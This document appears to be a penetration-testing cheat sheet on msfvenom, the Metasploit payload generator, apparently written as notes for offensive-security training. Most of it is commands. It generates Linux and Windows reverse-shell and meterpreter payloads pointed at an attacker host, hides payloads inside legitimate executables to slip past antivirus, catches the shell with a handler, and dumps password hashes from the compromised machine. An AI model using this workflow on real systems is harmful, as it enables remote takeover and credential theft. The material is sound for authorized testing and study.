# Msfvenom

{% embed url="<https://www.offsec.com/metasploit-unleashed/msfvenom/>" %}

### General syntax

{% code overflow="wrap" %}

```sh
$ msfvenom --payload <payload> --format <format> --platform <platform> --arch <architecture> LHOST=<ATTACKER_ADDR> LPORT=<ATTACKER_LISTEN_PORT> --output <output_file>

# short form options
$ msfvenom -p <payload> -f <format> --platform <platform> -a <architecture> LHOST=<ATTACKER_ADDR> LPORT=<ATTACKER_LISTEN_PORT> -o <output_file>
```

{% endcode %}

### Help menu

```bash
$ msfvenom -h
```

### List available options for module type

```bash
$ msfvenom -l payloads
$ msfvenom -l encoders
$ msfvenom -l nops
$ msfvenom -l all
```

### Payload option

```bash
$ msfvenom -p ...

# eg. 
$ msfvenom -p linux/x86/shell_reverse_tcp
```

#### General payload naming convention

`<OS>/<architecture>/<payload>`

1. `OS`: Operating system

* *windows*, *linux*

1. `Architecture`: *x64* or *x86*

* *x86* (32-bit) by default, if not specified

3. `Payload`: *reverse\_tcp*, *bind\_tcp*, etc.

#### Common payloads

**32-bit variant**

1. `windows/shell/reverse_tcp`&#x20;
2. `windows/shell_reverse_tcp`

**64-bit variant**

1. `windows/x64/shell/reverse_tcp` | `linux/x64/shell/reverse_tcp`
2. `windows/x64/shell_reverse_tcp` | `linux/x64/shell_reverse_tcp`
3. `windows/x64/meterpreter/reverse_tcp` | `linux/x64/meterpreter/reverse_tcp`
4. `windows/x64/meterpreter_reverse_tcp` | `linux/x64/meterpreter_reverse_tcp`&#x20;

### Format option

```bash
$ msfvenom -f ...

# eg.
$ msfvenom -f elf
$ msfvenom -f exe
```

***Note***: The output from `msfvenom` provides the shellcode (typically raw machine code) that can be executed on the target architecture, and is defined by the `-p` flag. The `-f` flag simply specifies the format for which the shellcode should be in.

Eg. **Powershell**

`[Byte[]] $buf = 0xfc,0x48,0x83,...`

Eg. **C**

`unsigned char buf[] = "\xfc\x48\x83...`

Eg. **Python**

`buf = b""`&#x20;

`buf += b"\xfc\x48\x8`

`buf += b"\...`

### Template

```sh
$ msfvenom -x ...
$ msfvenom --template ...
```

* can be used to specify a custom executable file to be used as template
* this means that the original functionality of the provided executable file will be fulfilled, but with the addition of the payload specified by an attacker
* may bypass AV, etc.

### CMD

{% code overflow="wrap" %}

```sh
$ msfvenom -p <payload> CMD="xxxx" -f <format> -o <output_file>.exe
```

{% endcode %}

Eg. Generate an x64 Windows `.exe` payload that executes a certain `powershell.exe` command (`CMD` option)

{% code overflow="wrap" %}

```sh
$ msfvenom -p windows/x64/exec CMD="powershell.exe ..." -f exe -o <output_file>.exe
```

{% endcode %}

### Example

`linux/x86/meterpreter/reverse_tcp`

```bash
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.xxx.xxx LPORT=8000 -f elf > shell.elf
```

#### Module to use on the attacking machine to catch a shell

`exploit/multi/handler`

```bash
msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost xxx.xxx.xxx.xxx
msf6 exploit(multi/handler) > set lport xxxx
msf6 exploit(multi/handler) > run
```

#### Run the shellcode on the target machine

```bash
# eg.
$ sudo ./shell.elf
```

#### Gain meterpreter shell on the attacker machine

```
meterpreter >
```

#### Using post exploitation hash dump module&#x20;

```bash
meterpreter > background
msf6 exploit(multi/handler) > sessions -l 

Active sessions
===============

  Id  Name  Type                  Information            Connection
  --  ----  ----                  -----------            ----------
  1         meterpreter x86/linux  ...                    ...

msf6 exploit(multi/handler) > use post/linux/gather/hashdump
msf6 post(linux/gather/hashdump) > show options
msf6 post(linux/gather/hashdump) > set session 1
msf6 post(linux/gather/hashdump) > run
...
```

{% embed url="<https://www.offsec.com/metasploit-unleashed/msfvenom/>" %}